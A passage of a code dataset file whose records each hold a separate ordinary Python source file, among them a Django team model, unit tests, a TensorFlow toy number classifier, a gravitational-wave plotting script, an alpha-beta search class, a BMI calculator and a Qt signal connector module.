arrival_time=itinerary[\"arrival_time\"]\n bus_num=itinerary[\"bus_num\"]\n print(\"Take \"+bus_num+\" to\"+arrival_stop+\" at \"+departure_time+\". Your estimated time of arrival is \"+arrival_time)\n break\n if command==\"less walking\":\n option=\"less_walking\"\n itinerary=google_api2(destination,option)\n arrival_stop=itinerary[\"arrival_stop\"]\n departure_time=itinerary['Departure_time']\n arrival_time=itinerary[\"arrival_time\"]\n bus_num=itinerary[\"bus_num\"]\n print(\"Take \"+bus_num+\" to \"+arrival_stop+\" at \"+departure_time+\". Your estimated time of arrival is \"+arrival_time)\n break\n if command==EXIT:\n print(\"Exiting\")\n time.sleep(2)\n break\n print(\"Sorry, thats not a valid option. Please select your preference for fewer teansfers or less walking, or say exit to start over\")\n time.sleep(5)\n elif command==EXIT:\n print(\"Exiting\")\n time.sleep(2)\n break\n else:\n print(\"Sorry, we couldnt find your destination. Please repeat your destination or say exit to start over\")\n time.sleep(5)\n if command==EXIT:\n print(\"Exiting\")\n time.sleep(2)\n break\n else:\n print(\"Sorry thats not a valid option. Please choose again\")\n time.sleep(1)\n \n \n","sub_path":"Recognise_Speech_Game.py","file_name":"Recognise_Speech_Game.py","file_ext":"py","file_size_in_byte":14973,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"368586130","text":"from django.db import models\nimport django.utils.timezone as timezone\nfrom django.contrib.auth.models import User\n\n# Create your models here.\n\nclass Teams (models.Model):\n name = models.CharField('队伍名',default='队伍名',max_length=10)\n description = models.CharField(default='在这里写队伍简介',max_length=100)\n image = models.ImageField('队伍头像',default='default.png',upload_to='images/')\n leader = models.ForeignKey(User,on_delete=models.CASCADE)\n email = models.EmailField('队长邮箱',max_length=50)\n mate1 = models.CharField('队员1',default='队员1', max_length=20)\n m1 = models.CharField('队员1联系方式', default='10086', max_length=20)\n mate2 = models.CharField('队员2',default='队员2', max_length=20)\n m2 = models.CharField('队员2联系方式', default='10086', max_length=20)\n mate3 = models.CharField('队员3',default='队员3', max_length=20)\n m3 = models.CharField('队员3联系方式', default='10086', max_length=20)\n mate4 = models.CharField('队员4',default='队员4', max_length=20)\n m4 = models.CharField('队员4联系方式', default='10086', max_length=20)\n mate5 = models.CharField('队员5',default='队员5', max_length=20)\n m5 = models.CharField('队员5联系方式', default='10086', max_length=20)\n add_date = models.DateTimeField('保存日期', default=timezone.now)\n mod_date = models.DateTimeField('最后修改日期', auto_now=True)\n def __str__(self):\n return self.name","sub_path":"teams/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":1506,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"602422242","text":"#!/usr/bin/env python3 -B\nimport unittest\n\nfrom cromulent import vocab\n\nfrom tests import TestSalesPipelineOutput, classification_sets\n\nvocab.add_attribute_assignment_check()\n\nclass PIRModelingTest_AR120(TestSalesPipelineOutput):\n def test_modeling_ar120(self):\n '''\n AR-120: Add bid records when no price indicated in a sales record.\n '''\n output = self.run_pipeline('ar120')\n texts = output['model-lo']\n activities = output['model-activity']\n \n prov1 = activities['tag:getty.edu,2019:digital:pipeline:REPLACE-WITH-UUID:sales#PROV,B-A15,1739-07-20,0233']\n assignments1 = [p for p in prov1.get('part', []) if p['type'] == 'AttributeAssignment']\n self.assertEqual(len(assignments1), 1)\n assignment1 = assignments1[0]\n self.assertEqual(assignment1['_label'], 'Bidding valuation of B-A15 0233 1739-07-20')\n self.assertEqual(classification_sets(assignment1), {'Bidding'})\n self.assertNotIn('assigned', assignment1)\n buyers1 = assignment1.get('carried_out_by', [])\n self.assertEqual(len(buyers1), 1) # bought-in, so no buyer data\n buyer1 = buyers1[0]\n self.assertEqual(buyer1['_label'], 'Servees')\n\n prov2 = activities['tag:getty.edu,2019:digital:pipeline:REPLACE-WITH-UUID:sales#PROV,Br-A1875,1792-02-18,0008']\n assignments2 = [p for p in prov2.get('part', []) if p['type'] == 'AttributeAssignment']\n self.assertEqual(len(assignments2), 1)\n assignment2 = assignments2[0]\n self.assertEqual(assignment2['_label'], 'Bidding valuation of Br-A1875 0008 1792-02-18')\n self.assertEqual(classification_sets(assignment2), {'Bidding'})\n self.assertNotIn('assigned', assignment2)\n buyers2 = assignment2.get('carried_out_by', [])\n self.assertEqual(len(buyers2), 1) # bought-in, so no buyer data\n buyer2 = buyers2[0]\n self.assertEqual(buyer2['_label'], 'Skirrow')\n\n\nif __name__ == '__main__':\n unittest.main()\n","sub_path":"tests/test_sales_issue_ar120.py","file_name":"test_sales_issue_ar120.py","file_ext":"py","file_size_in_byte":2002,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"410156599","text":"import tensorflow\nimport itertools\nimport random\n\nfrom time import time\n\nclass ClassifiedNumber:\n \n def __init__(self, number):\n \n self.__number = number\n \n if number == 0:\n self.__classifiedAs = 0 # zero\n \n elif number > 0:\n self.__classifiedAs = 1 # positive\n \n elif number < 0:\n self.__classifiedAs = 2 # negative\n \n def number(self):\n return self.__number\n \n def classifiedAs(self):\n return self.__classifiedAs\n \ndef classifiedAsString(classifiedAs):\n \n if classifiedAs == 0:\n return \"Zero\"\n \n elif classifiedAs == 1:\n return \"Positive\"\n \n elif classifiedAs == 2:\n return \"Negative\"\n\ndef trainDatasetFunction():\n \n trainNumbers = []\n trainNumberLabels = []\n \n for i in range(-1000, 1001): \n number = ClassifiedNumber(i)\n trainNumbers.append(number.number())\n trainNumberLabels.append(number.classifiedAs())\n \n return ( {\"number\" : trainNumbers } , trainNumberLabels )\n\ndef inputDatasetFunction():\n \n global randomSeed\n random.seed(randomSeed) # to get same result\n \n numbers = []\n \n for i in range(0, 4):\n numbers.append(random.randint(-9999999, 9999999))\n \n return {\"number\" : numbers }\n \ndef main():\n \n print(\"TensorFlow Positive-Negative-Zero numbers classifier test by demensdeum 2017 (demensdeum@gmail.com)\")\n \n maximalClassesCount = len(set(trainDatasetFunction()[1])) + 1\n \n numberFeature = tensorflow.feature_column.numeric_column(\"number\")\n classifier = tensorflow.estimator.DNNClassifier(feature_columns = [numberFeature], hidden_units = [10, 20, 10], n_classes = maximalClassesCount)\n generator = classifier.train(input_fn = trainDatasetFunction, steps = 1000).predict(input_fn = inputDatasetFunction)\n \n inputDataset = inputDatasetFunction()\n \n results = list(itertools.islice(generator, len(inputDatasetFunction()[\"number\"])))\n \n i = 0\n for result in results:\n print(\"number: %d classified as %s\" % (inputDataset[\"number\"][i], classifiedAsString(result[\"class_ids\"][0])))\n i += 1\n\nrandomSeed = time()\n\nmain()","sub_path":"1numberClassifier/numberClassifier.py","file_name":"numberClassifier.py","file_ext":"py","file_size_in_byte":2245,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"199088457","text":"from flask import Flask, json, jsonify\nimport db\nimport json\n\napp = Flask(__name__)\n \n@app.route(\"/\")\ndef hello():\n with open(\"data.json\") as fh:\n data = json.load(fh)\n\n return jsonify(data)\n\nif __name__ == \"__main__\":\n #db.process_db()\n app.run(debug=True)\n \n","sub_path":"backend/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":285,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"640721510","text":"from datetime import timedelta\nfrom unittest import mock\n\nimport pytest\nfrom django.utils import timezone\n\nfrom configuration import sitemaps\nfrom zine import models\n\n\n@pytest.fixture\ndef get_sitemap_class():\n def _get_sitemap_class(sitemap_type):\n return {\n 'issue': sitemaps.IssueSitemap,\n 'article': sitemaps.ArticleSitemap,\n 'miscellaneous': sitemaps.MiscellaneousPageSitemap,\n }.get(sitemap_type)\n return _get_sitemap_class\n\n\n@pytest.fixture\ndef example_pages():\n return [\n 'someapp:somepage',\n 'someotherapp:somepage',\n ]\n\n\n@pytest.mark.django_db\nclass TestIssueSiteMap:\n def test_issue_sitemap_when_no_issues(self, get_sitemap_class):\n sitemap = get_sitemap_class('issue')()\n assert list(sitemap.items()) == []\n\n def test_issue_sitemap_when_no_published_issues(self, get_sitemap_class):\n sitemap = get_sitemap_class('issue')()\n\n models.Issue.objects.create(\n title='Unpublished Issue',\n slug='unpublished-issue',\n publication_date=timezone.now() + timedelta(hours=1),\n synopsis='An unpublished issue',\n )\n assert list(sitemap.items()) == []\n\n def test_issue_sitemap_when_published_issues(self, get_sitemap_class):\n sitemap = get_sitemap_class('issue')()\n\n issue = models.Issue.objects.create(\n title='Published Issue',\n slug='published-issue',\n publication_date=timezone.now(),\n synopsis='A published issue',\n )\n assert issue in sitemap.items()\n assert sitemap.lastmod(issue) == issue.updated_time\n\n\n@pytest.mark.django_db\nclass TestArticleSiteMap:\n def test_article_sitemap_when_no_articles(self, get_sitemap_class):\n sitemap = get_sitemap_class('article')()\n assert list(sitemap.items()) == []\n\n def test_article_sitemap_when_no_published_articles(self, get_sitemap_class):\n sitemap = get_sitemap_class('article')()\n\n issue = models.Issue.objects.create(\n title='Unpublished Issue',\n slug='unpublished-issue',\n publication_date=timezone.now() + timedelta(hours=1),\n synopsis='An unpublished issue',\n )\n\n models.Article.objects.create(\n title='Unpublished Article',\n slug='unpublished-article',\n issue=issue,\n synopsis='An unpublished issue',\n )\n\n assert list(sitemap.items()) == []\n\n def test_article_sitemap_when_published_articles(self, get_sitemap_class):\n sitemap = get_sitemap_class('article')()\n\n issue = models.Issue.objects.create(\n title='Unpublished Issue',\n slug='unpublished-issue',\n publication_date=timezone.now(),\n synopsis='An unpublished issue',\n )\n\n article = models.Article.objects.create(\n title='Unpublished Article',\n slug='unpublished-article',\n issue=issue,\n synopsis='An unpublished issue',\n )\n\n assert article in sitemap.items()\n assert sitemap.lastmod(article) == article.updated_time\n\n\n@pytest.mark.django_db\nclass TestMiscellaneousPagesSitemap:\n def test_lastmod(self, get_sitemap_class, example_pages):\n sitemap = get_sitemap_class('miscellaneous')(example_pages)\n\n expected = timezone.now()\n actual = sitemap.lastmod(None)\n assert (actual.year, actual.month, actual.day, actual.hour, actual.minute) == (expected.year, expected.month, expected.day, expected.hour, expected.minute)\n\n def test_location(self, get_sitemap_class, example_pages):\n sitemap = get_sitemap_class('miscellaneous')(example_pages)\n\n for name in sitemap.names:\n with mock.patch('configuration.sitemaps.reverse') as mock_reverse:\n sitemap.location(name)\n mock_reverse.assert_called_once_with(name)\n\n def test_items(self, get_sitemap_class, example_pages):\n sitemap = get_sitemap_class('miscellaneous')(example_pages)\n assert sitemap.items() == example_pages\n","sub_path":"configuration/tests/test_sitemaps.py","file_name":"test_sitemaps.py","file_ext":"py","file_size_in_byte":4110,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"79004349","text":"#!/usr/bin/python\nimport numpy as np\nimport pylab as py\nfrom COMMON import nanosec,yr,week,grav,msun,light,mpc,hub0,h0,omm,omv\nfrom scipy import integrate\nimport COMMON as CM\nimport pyPdf,os\nfrom matplotlib import colors\nfrom USEFUL import time_estimate\nfrom scipy.interpolate import interp1d\nimport Formulas_AjithEtAl2008 as A8\nimport matplotlib.pyplot as plt\nimport matplotlib as mpl\n\n#Input parameters:\nfrom INPUT_PARAMETERS import *\ncb_width=0.014\ncb_height=0.81\nleft, right, top, bottom, cb_fraction=0.065, 0.929, 0.97, 0.16, 0.08 #Borders of the plot.\nmaxsnrlevel=3.2 #Maximum S/N level in the colorbar.\nminsnrlevel=np.log10(snrt) #Minimum one.\nsnrlevels=8\noutputplot='../plots/z_vs_f_EPTA_ALL_'+flim_model+'.png'\ninputdatadir='../data/output/SNR_z_vs_f_EPTA_A8/' #Input directory.\n#-----------------------------------------------------------------\n\n#Optimal plotting options.\n#import PARAMETER_PLOTS\n#Choose plotting options that look optimal for the paper.\nfig_width = 3.4039*2.\nfig_height = fig_width * 0.32\nsizepoints=9\nlegendsizepoints=7\npy.rcParams.update({\n\t'backend': 'ps',\n\t'ps.usedistiller': 'xpdf',\n\t'text.usetex': True,\n\t'figure.figsize': [fig_width, fig_height],\n\t'axes.titlesize': sizepoints,\n\t'axes.labelsize': sizepoints,\n\t'text.fontsize': sizepoints,\n\t'xtick.labelsize': sizepoints,\n\t'ytick.labelsize': sizepoints,\n\t'legend.fontsize': legendsizepoints\n})\n\n#Identify masses.\nplotfiles=np.array(os.listdir(inputdatadir))\nmchvec=[]\nmchfiles=[]\nfor mi in xrange(len(plotfiles)):\n\tif plotfiles[mi][-4:]!='.npy':\n\t\tcontinue\n\tmchvec.append(np.log10(eval(plotfiles[mi][3:-4])))\n\tmchfiles.append(plotfiles[mi])\nindisort=np.array(mchvec).argsort()\nmchvec=np.array(mchvec)[indisort]\nmchfiles=np.array(mchfiles)[indisort]\n\n#Create 3 plots.\nfig, axes = plt.subplots(nrows = 1, ncols = 3)\nfig.subplots_adjust(left=left,right=right,top=top,bottom=bottom)\n\nlevels=np.linspace(minsnrlevel, maxsnrlevel, snrlevels)\n\nfor mi in xrange(len(mchfiles)):\n\tmchi=mchvec[mi]\n\tmch=10**(mchi) #Chirp mass of the BH binary.\n\tm=mch*2**(1./5.) #Mass of each individual BH, assuming equal masses.\n\tnu=CM.nu_f(m,m) #Symmetric mass ratio.\n\tmtot=2.*m #Total mass.\n\n\tax=axes[mi]\n\n\t#Modify axes and ticks.\n\tax.set_yscale('log')\n\tax.set_xscale('log')\n\n\t#Load data.\n\tdata=np.load(inputdatadir+mchfiles[mi])[()]\n\tsnr_final_mat=data['snr_mat']\n\tf_mat=data['f_mat']\n\tz_mat=data['z_mat']\n\tz_app=data['z_app']\n\n\tlso_mat=np.zeros(np.shape(z_mat))\n\tif flim_model=='ISCO':\n\t\tflim_mat=CM.felso(m, m)*1./(1.+z_mat)\n\telif flim_model=='A8':\n\t\tflim_mat=A8.f_cut(nu, mtot)*1./(1.+z_mat)\n\t\tlso2_mat=np.zeros(np.shape(z_mat))\n\t\tlso2_mat[f_mat>=CM.felso(m, m)*1./(1.+z_mat)]=1 #I decide to plot the ISCO line in any case\n\tsnr_final_mat[snr_final_mat<=0.]=np.nan\n\tsnr_final_mat[snr_final_mat>0.]=np.log10(snr_final_mat[snr_final_mat>0.])\n\n\tlso_mat[f_mat>=flim_mat]=1\n\t\n\tcmap = colors.ListedColormap(['white','black'])\n\tax.contourf(f_mat, z_mat, lso_mat, origin='lower', interpolation='None', aspect='auto',alpha=0.5, cmap=cmap)\n\tax.set_xscale('log')\n\tax.set_yscale('log')\n\t#cmap = colors.ListedColormap(['red'])\n\tax.contourf(f_mat, z_mat, lso2_mat, origin='lower', interpolation='None', aspect='auto',alpha=0.5, cmap=cmap)\n\tcmap=py.cm.winter\n\tsnrmap=ax.contourf(f_mat, z_mat, snr_final_mat, origin='lower', interpolation='None', aspect='auto', alpha=0.5, cmap=cmap, levels=levels)\n\n\tcmap = colors.ListedColormap(['white', 'red'])\n\tsnr_final_mat_t=snr_final_mat.copy()\n\tsnr_final_mat_t[10**(snr_final_mat)=snrt]=10\n\tax.contourf(f_mat, z_mat, snr_final_mat_t, origin='lower', interpolation='None', aspect='auto', alpha=0.5, cmap=cmap, levels=[0., 5.])\n\n\tcmap = colors.ListedColormap(['black'])\n\tax.contour(f_mat, z_mat, snr_final_mat, origin='lower', interpolation='None', aspect='auto', alpha=0.2, cmap=cmap, levels=levels)\n\tax.contour(f_mat, z_mat, z_app, origin='lower', interpolation='None', aspect='auto',cmap=cmap, levels=[0])\n\n\t#cb = fig.colorbar(snrmap,fraction=cb_fraction,format='$%i$', ticks=[-2., -1., 0., 1., 2., 3., 4.])\n\n\tif mi==0:\n\t\tax.set_ylabel('$\\log_{10}(\\\\mathrm{Redshift})$')\n\telif mi==1:\n\t\tax.set_xlabel('$\\log_{10}(\\\\mathrm{Initial\\ GW\\ observed\\ frequency\\ /\\ Hz})$')\n\tax.set_xlim(np.amin(f_mat), np.amax(f_mat))\n\tax.set_ylim(minreds, maxreds)\n\tax.set_xticks([1e-9,1e-8,1e-7])\n\tax.set_xticklabels([\" \",\"$-8$\",\"$-7$\"])\n\tax.set_yticks([1e-2,1e-1,1e0,1e1,1e2, 1e3])\n\tax.set_yticklabels([\"$-2$\",\"$-1$\",\"$0$\",\"$1$\",\"$2$\",\"$3$\"])\n\t#cb.set_label('$\\\\log_{10}(\\\\mathrm{S/N})$')\n\t#ax.text(xmin*2,ymin*2,'$10^{%.1f}M_{\\\\odot}$'%mchi,fontsize=9)\n\nfor ax in (axes[1], axes[2]):\n\tpy.setp(ax.get_yticklabels(), visible=False)\n\n#py.tight_layout() #This resizes the plots in a particular way, disregarding left, right, top, bottom.\nplt.subplots_adjust(wspace = 0.02) #Whitespace between each subplot.\n\n#fig.subplots_adjust(right=0.85)\ncbar_ax = fig.add_axes([right*1.01, bottom, cb_width, cb_height])\nfig.colorbar(snrmap, cax=cbar_ax, format='$%i$', ticks=[1., 2., 3.]).set_label('$\\\\log_{10}(\\\\mathrm{S/N})$')\n\nfig.savefig(outputplot, dpi=600)\n","sub_path":"more/PLOT_PAPER_z_vs_f.py","file_name":"PLOT_PAPER_z_vs_f.py","file_ext":"py","file_size_in_byte":5063,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"364608470","text":"class AlphaBetaDetective:\n \n def __init__(self, root):\n self.root = root # GameNode\n return\n\n def alpha_beta_search(self, node):\n infinity = float('inf')\n best_val = infinity\n alpha = infinity\n\n successors = self.getSuccessors(node)\n best_state = None\n for state in successors:\n value = self.max_value(state, best_val, alpha)\n if value < best_val:\n best_val = value\n best_state = state\n return best_state\n\n def max_value(self, node, alpha, beta):\n if self.isTerminal(node):\n return self.getUtility(node)\n infinity = float('inf')\n value = -infinity\n\n successors = self.getSuccessors(node)\n for state in successors:\n value = max(value, self.min_value(state, alpha, beta))\n if value >= beta:\n return value\n alpha = max(alpha, value)\n return value\n\n def min_value(self, node, alpha, beta):\n if self.isTerminal(node):\n return self.getUtility(node)\n infinity = float('inf')\n value = infinity\n\n successors = self.getSuccessors(node)\n for state in successors:\n value = min(value, self.max_value(state, alpha, beta))\n if value <= alpha:\n return value\n beta = min(beta, value)\n\n return value\n\n def getSuccessors(self, node):\n assert node is not None\n return node.child\n\n def isTerminal(self, node):\n assert node is not None\n return len(node.child) == 0\n\n def getUtility(self, node):\n assert node is not None\n return node.score","sub_path":"AlphaBeta/AlphaBetaDetective.py","file_name":"AlphaBetaDetective.py","file_ext":"py","file_size_in_byte":1698,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"123580561","text":"import pytest\n\nfrom unittest.mock import patch\n\nfrom flask import Flask\n\nfrom bas_web_map_inventory import create_app\n# TestingConfig is renamed to prevent PyTest trying to test the class\nfrom bas_web_map_inventory.config import Config, TestingConfig as _TestingConfig\n\n\n@pytest.mark.usefixtures('app')\ndef test_app(app):\n assert app is not None\n assert isinstance(app, Flask)\n\n\n@pytest.mark.usefixtures('app')\ndef test_app_environment(app):\n assert app.config['TESTING'] is True\n\n\ndef test_app_no_environment():\n with patch('bas_web_map_inventory._create_app_config') as mock_create_app_config:\n config = Config()\n mock_create_app_config.return_value = config\n\n app = create_app()\n assert app is not None\n assert isinstance(app, Flask)\n assert app.config['TESTING'] is False\n\n\ndef test_app_enable_log_file():\n with patch('bas_web_map_inventory._create_app_config') as mock_create_app_config:\n config = _TestingConfig()\n config.APP_ENABLE_FILE_LOGGING = True\n mock_create_app_config.return_value = config\n\n app = create_app()\n assert app is not None\n assert isinstance(app, Flask)\n assert app.config['TESTING'] is True\n assert app.config['APP_ENABLE_FILE_LOGGING'] is True\n\n\ndef test_app_enable_sentry():\n with patch('bas_web_map_inventory._create_app_config') as mock_create_app_config:\n config = _TestingConfig()\n config.APP_ENABLE_SENTRY = True\n mock_create_app_config.return_value = config\n\n app = create_app()\n assert app is not None\n assert isinstance(app, Flask)\n assert app.config['TESTING'] is True\n assert app.config['APP_ENABLE_SENTRY'] is True\n\n\n@pytest.mark.usefixtures('app_runner')\ndef test_cli_help(app_runner):\n result = app_runner.invoke(args=['--help'])\n assert 'Show this message and exit.' in result.output\n\n\n@pytest.mark.usefixtures('app_runner')\ndef test_cli_version(app_runner):\n result = app_runner.invoke(args=['version'])\n assert 'Version: N/A' in result.output\n","sub_path":"tests/bas_web_map_inventory/test_app.py","file_name":"test_app.py","file_ext":"py","file_size_in_byte":2073,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"496957632","text":"H = float(input('请输入您的身高,单位为m'))\r\nW = float(input('请输入你的体重,单位为kg'))\r\nBMI = W /(H * H)\r\nprint('您的BMI值为%.2f'%(BMI))\r\nstatus = '肥胖'\r\nif(BMI < 18.5):\r\n status = '偏瘦'\r\nelif(BMI < 25):\r\n status = '正常'\r\nelif(BMI < 30):\r\n status = '偏胖'\r\nprint('您处于{}的状态'.format(status))\r\nprint('正常体重的BMI值应该处于18.5与25之间')\r\nprint('建议您将体重维持��%.2fkg与%.2fkg之间'%(18.5*H*H,25*H*H))\r\n","sub_path":"python/code/BMI.py","file_name":"BMI.py","file_ext":"py","file_size_in_byte":488,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"194250346","text":"# Class for exercise class subclass of exercise\nfrom exercise import Exercise\nfrom random import randint\n\n\nclass ExerciseClass(Exercise):\n\n def __init__(self,duration=10, bodyGroup='Total Body', instructor='Unknown', classType='Spin Class'):\n\n Exercise.__init__(self, duration, bodyGroup)\n self.instructor = instructor\n self.type = classType\n\n\n def test(self):\n Exercise.test(self)\n print(\"Exercise Class\")\n print(self.instructor)\n print(self.type)\n \n\n\n# ex = ExerciseClass(duration = 20, bodyGroup='Arms')\n# ex.test()\n# ex2 = ExerciseClass(instructor='Jessica Hayes', classType='KickBoxing')\n# ex2.test()\n\n","sub_path":"exerciseclass.py","file_name":"exerciseclass.py","file_ext":"py","file_size_in_byte":669,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"287654519","text":"# this project is licensed under the WTFPLv2, see COPYING.txt for details\n\n\"\"\"Connector for signals and slots of categories.\n\n.. _connector:\n\nConnector\n---------\n\nIn Qt, a signal of an object can be connected to the slot of another object, so when the signal of this object\nis emitted, the slot of that object is called. However, the connections are individual: even though a signal\nexists for a whole class of object, it's not possible to connect the signal of all objects of a class to one slot.\n\nIn EYE, the connector allows to connect a signal of all existing objects matching a category (see :ref:`categories`)\nas well as future objects matching this category, to a function.\n\n.. _categories:\n\nCategories\n----------\n\nA category is a string tag attached to an object. An object can have multiple categories.\nCategories can be added to/removed from an object dynamically, though often the categories\nwill be set when the object is created.\nSince the connector (see :ref:`connector`) allows automatic connection of many objects to a function, categories\nallow finer grained control of what objects should be connected than if the class of the objects was the only\ncriterion of connection.\n\nExample\n-------\n\nAll objects of the class :class:`eye.widgets.Editor` have by default the category ``\"editor\"`` and that class has the\n``fileSaved = Signal(str)`` signal, where the first argument is the path of the saved file.\nWhen configuring EYE (see :doc:`configuration`), it's possible to add this code::\n\n\tfrom eye.connector import registerSignal\n\n\t@registerSignal('editor', 'fileSaved')\n\tdef foo(editor_obj, path):\n\t\tprint('file %s was saved' % path)\n\nWe connect the ``fileSaved`` signal all objects having the category ``\"editor\"`` to the ``foo`` callback, which will\nreceive multiple arguments, first the object which sent the signal, and then the arguments of the ``fileSaved`` signal.\nWhen a new Editor widget will be created, it will automatically be connected to our callback, so when any editor will be\nsaved, ``foo`` will be called.\n\nModule contents\n---------------\n\"\"\"\n\nimport inspect\nfrom logging import getLogger\nimport weakref\n\nfrom PyQt5.QtCore import QObject\nfrom PyQt5.QtWidgets import QWidget\n\nfrom .qt import Signal, Slot\nfrom .three import bytes, str\nfrom .utils import exceptionLogging\nfrom . import BUILDING_DOCS, _addDoc\n\n__all__ = ('registerSignal', 'registerEventFilter', 'disabled',\n 'registerSetup', 'registerTeardown',\n 'deleteCreatedBy',\n 'defaultEditorConfig', 'defaultWindowConfig', 'defaultLexerConfig',\n 'categoryObjects', 'CategoryMixin')\n\n\nLOGGER = getLogger(__name__)\n\n\ndef to_stringlist(obj):\n\tif isinstance(obj, (str, bytes)):\n\t\treturn [obj]\n\telse:\n\t\treturn obj\n\n\nclass ListenerMixin(object):\n\tdef unregister(self):\n\t\tobjects = CONNECTOR.objectsMatching(self.categories)\n\t\tfor obj in objects:\n\t\t\tself.doDisconnect(obj)\n\n\nclass SignalListener(QObject, ListenerMixin):\n\tdef __init__(self, cb, categories, signal, parent=None):\n\t\tsuper(SignalListener, self).__init__(parent)\n\t\tself.cb = cb\n\t\tself.categories = categories\n\t\tself.signal = signal\n\t\tself.caller = None\n\n\t@Slot(int)\n\t@Slot(str)\n\t@Slot(bytes)\n\t@Slot(QObject)\n\t@Slot(QWidget)\n\t@Slot(object)\n\t@Slot(int, int)\n\t@Slot(str, str)\n\t@Slot(int, str)\n\t@Slot(str, int)\n\t@Slot(str, object)\n\t@Slot(object, object)\n\t@Slot()\n\tdef map(self, *args, **kwargs):\n\t\tif not getattr(self.cb, 'enabled', True):\n\t\t\treturn\n\n\t\twith exceptionLogging(reraise=False, logger=LOGGER):\n\t\t\tsender = kwargs.get('sender', self.sender())\n\t\t\tself.cb(sender, *args)\n\n\tdef doConnect(self, obj):\n\t\tgetattr(obj, self.signal).connect(self.map)\n\n\tdef doDisconnect(self, obj):\n\t\tgetattr(obj, self.signal).disconnect(self.map)\n\n\nclass ConnectListener(ListenerMixin):\n\tdef __init__(self, cb, categories, parent=None):\n\t\tsuper(ConnectListener, self).__init__()\n\t\tself.cb = cb\n\t\tself.categories = categories\n\t\tself.caller = None\n\n\tdef map(self, obj):\n\t\tif getattr(self.cb, 'enabled', True):\n\t\t\twith exceptionLogging(reraise=False, logger=LOGGER):\n\t\t\t\tself.cb(obj)\n\n\nclass SetupListener(ConnectListener):\n\tdef doConnect(self, obj):\n\t\tself.map(obj)\n\n\tdef doDisconnect(self, obj):\n\t\tpass\n\n\nclass TearListener(ConnectListener):\n\tdef doConnect(self, obj):\n\t\tpass\n\n\tdef doDisconnect(self, obj):\n\t\tself.map(obj)\n\n\nclass EventFilter(QObject, ListenerMixin):\n\tdef __init__(self, cb, categories, eventTypes, parent=None):\n\t\tsuper(EventFilter, self).__init__(parent)\n\t\tself.cb = cb\n\t\tself.categories = categories\n\t\tself.eventTypes = eventTypes\n\t\tself.caller = None\n\n\tdef eventFilter(self, obj, ev):\n\t\tret = False\n\t\tif getattr(self.cb, 'enabled', True) and ev.type() in self.eventTypes:\n\t\t\twith exceptionLogging(reraise=False, logger=LOGGER):\n\t\t\t\tret = bool(self.cb(obj, ev))\n\t\treturn ret\n\n\tdef doConnect(self, obj):\n\t\tobj.installEventFilter(self)\n\n\tdef doDisconnect(self, obj):\n\t\tobj.removeEventFilter(self)\n\n\nclass EventConnector(QObject):\n\tcategoryAdded = Signal(object, str)\n\tcategoryRemoved = Signal(object, str)\n\n\tdef __init__(self):\n\t\tsuper(EventConnector, self).__init__()\n\t\tself.allObjects = weakref.WeakSet()\n\t\tself.allListeners = []\n\n\tdef doConnect(self, obj, lis, cats=None):\n\t\tLOGGER.debug('connecting %r to %r (from file %r) in %r categories', obj, lis.cb, inspect.getfile(lis.cb), cats)\n\t\twith exceptionLogging(reraise=False, logger=LOGGER):\n\t\t\tlis.doConnect(obj)\n\n\tdef doDisconnect(self, obj, lis, cats=None):\n\t\tLOGGER.debug('disconnecting %r to %r (from file %r) in %r categories', obj, lis.cb, inspect.getfile(lis.cb), cats)\n\t\twith exceptionLogging(reraise=False, logger=LOGGER):\n\t\t\tlis.doDisconnect(obj)\n\n\tdef addListener(self, categories, lis):\n\t\tself.allListeners.append(lis)\n\n\t\t# iterate on list copy to avoid concurrent access\n\t\tfor obj in list(self.allObjects):\n\t\t\tif categories <= obj.categories():\n\t\t\t\tself.doConnect(obj, lis, categories)\n\n\tdef addObject(self, obj):\n\t\tself.allObjects.add(obj)\n\n\t\toc = obj.categories()\n\t\tif not oc:\n\t\t\treturn\n\n\t\tfor lis in self.allListeners:\n\t\t\tif lis.categories <= oc:\n\t\t\t\tself.doConnect(obj, lis, lis.categories)\n\n\tdef addCategory(self, obj, cat):\n\t\toc = obj.categories()\n\n\t\tfor lis in self.allListeners:\n\t\t\tif lis.categories:\n\t\t\t\tif cat in lis.categories and lis.categories <= oc:\n\t\t\t\t\tself.doConnect(obj, lis, cat)\n\t\t\telif len(obj.categories()) == 1:\n\t\t\t\tself.doConnect(obj, lis, cat)\n\t\tself.categoryAdded.emit(obj, cat)\n\n\tdef removeCategory(self, obj, cat):\n\t\tfor lis in self.allListeners:\n\t\t\tif cat in lis.categories:\n\t\t\t\tself.doDisconnect(obj, lis, cat)\n\t\tself.categoryRemoved.emit(obj, cat)\n\n\tdef objectsMatching(self, categories):\n\t\tcategories = frozenset(to_stringlist(categories))\n\t\treturn [obj for obj in self.allObjects if categories <= obj.categories()]\n\n\tdef deleteCreatedBy(self, caller):\n\t\t\"\"\"Unregister listeners registered in file `caller`.\"\"\"\n\t\tnewListeners = []\n\t\tfor lis in self.allListeners:\n\t\t\tif lis.caller == caller:\n\t\t\t\tlis.unregister()\n\t\t\telse:\n\t\t\t\tnewListeners.append(lis)\n\t\tself.allListeners = newListeners\n\n\nclass CategoryMixin(object):\n\t\"\"\"Mixin class to support object categories.\n\n\tThis class should be inherited by classes of objects which should have categories.\n\t\"\"\"\n\n\tdef __init__(self, **kwargs):\n\t\tsuper(CategoryMixin, self).__init__(**kwargs)\n\t\tself._categories = set()\n\t\tCONNECTOR.addObject(self)\n\n\tdef categories(self):\n\t\t\"\"\"Return categories of the 